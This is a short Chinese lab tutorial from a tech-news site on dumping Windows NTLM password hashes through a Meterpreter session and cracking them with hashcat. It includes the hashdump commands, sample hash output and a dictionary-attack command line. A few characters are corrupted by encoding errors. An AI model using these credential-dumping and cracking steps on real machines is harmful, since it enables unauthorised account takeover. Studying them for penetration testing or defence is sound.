您好,登錄后才能下訂單哦!
這期內(nèi)容當中小編將會給大家?guī)碛嘘P(guān)如何破解內(nèi)網(wǎng)hash值,文章內(nèi)容豐富且以專業(yè)的角度為大家分析和敘述,閱讀完這篇文章希望大家可以有所收獲。
環(huán)境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.137
一、生成木馬及監(jiān)聽主機參考上篇文章:
內(nèi)網(wǎng)滲透 -- 提升權(quán)限(利用提權(quán)漏洞)
二、獲取內(nèi)網(wǎng)的hash值
1、直接獲取:hashdump
meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
2、通過模塊獲?。簉un post/windows/gather/hashdump
三、破解內(nèi)網(wǎng)的hash值
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::aiyou:1002:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
1、將最后一段密文復制到在線解密網(wǎng)站
2、利用hashcat離線破解
hashcat -a 0 -m 1000 1.txt 2.txt --force
-a 指定攻擊模式,有5種模式
0 Straight(字典破解)
1 Combination(組合破解)
3 Brute-force(掩碼暴力破解)
6 Hybrid dict + mask(混合字典+掩碼)
7 Hybrid mask + dict(混合掩碼+字典)
-m 指定hash類型
1.txt內(nèi)容為獲取的hash值
2.txt內(nèi)容為解密的字典
上述就是小編為大家分享的如何破解內(nèi)網(wǎng)hash值了,如果剛好有類似的疑惑,不妨參照上述分析進行理解。如果想知道更多相關(guān)知識,歡迎關(guān)注億速云行業(yè)資訊頻道。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。